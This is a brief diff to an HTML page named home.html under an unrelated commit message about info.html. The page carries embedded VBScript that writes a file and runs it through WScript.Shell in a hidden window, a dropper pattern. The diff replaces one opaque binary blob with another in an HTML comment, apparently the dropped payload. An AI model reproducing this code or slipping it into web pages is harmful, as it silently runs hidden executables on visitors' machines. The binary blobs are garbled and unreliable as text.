putting structure for info.html

--- a/home.html
+++ b/home.html
@@ -42,5 +42,4 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--{+„É}Ïv‰ôÕÎÛÜýñ¾ããg/è}ä8¯xûb¥³ü+K,¬6Q‡T6RhZD{›²ŽX›¦cÄæn¿{
-…ââé€¹"f³ù» Ûs×1h‹R`£îwËÂ.F»e|¨ùÙS‘!êý?æ{®$2jq©í±¾‡va¤~%\&z•åSQoô'S‰bÄßùÎ ûZ·;ªâû¹Z=:²J-\FãßÄ¿ª—^Ò™|EAˆ1ÉáØ#Æô0¥àž[(œ;·ù ‰¹'¿. –°©öZºò¸Õ»²e–‘'€ípn™$ «ÜUÎÕÌO÷Œ1þH˜§ò\ÅSVmn7JßvÊ–4/>DË&wh¿œ”uöì’Nõä¼‹“èŒÚ^·ùS¼9ë=9êP÷$(î;—W1f»®VGÎ×†°­Ñ©€mï…kyñÓ·ÌUÐ¼ŸãÞú2À†‚Îpê'Ö œ‡ã*%_3¶Éð¬qa•#Îìn¬gBIXÑ`ˆÜn>¤ïÉVÁÃ‡t¥ª;#šö á(R"3ùá(á(á(¬õO úZÆâ( á(-->
+//--></SCRIPT><!--ÕÏ›åö`ÙâÐˆ H2xhÆ® YêR}Ï¶ê B\ÞKŠX¥ÎñJ'RU7 îm¶ç°s¢îóƒû]ˆì ±ÚÊ¬üõ·êˆ*â×Ðßðaœœu¿d(\eÁÇ5dÑEÔQµC@ŽyÒA(gŽ»Sû«•¶ä ØâdìÀÐXJÉý×Û¶$‡.ëú¤–„I»¤ˆü±pcì£®FzŸ™ ¼å(s/]Æg+Š}qþïüýøë›?›<Ñ¡˜u*3<ïÌ*¥ºPˆÒBbÛÁ>àÖ³³¼‘†WCü\9–&õrªêXjÇ_f9Wýù¿’ŽÈsìýUUÞŸàgï†zŠ!ã~Žx.Ýô¤Åí¯7®ŽE|ÉâHþ³æä°ŒG-&‘L¿n Uûâ½ëª^MFyoQ6[mv¶veávªáOPñ!„6¹ ±zBx”*ò 	“Â­éÎ|TÁÉ¯šBÕ®£ŒenˆkòûŸ-6œªóžØœÑ/X'ô7êÐ¬tfÔÂ†Œ¹5Ø7Ð]mz/R7›«÷½ê4uGPâÑÄìA6¹©é6ÐÔ ÒÇN£5FžÀ á(R"3ùá(á(á(¬õO^çûZÆâ( á(-->
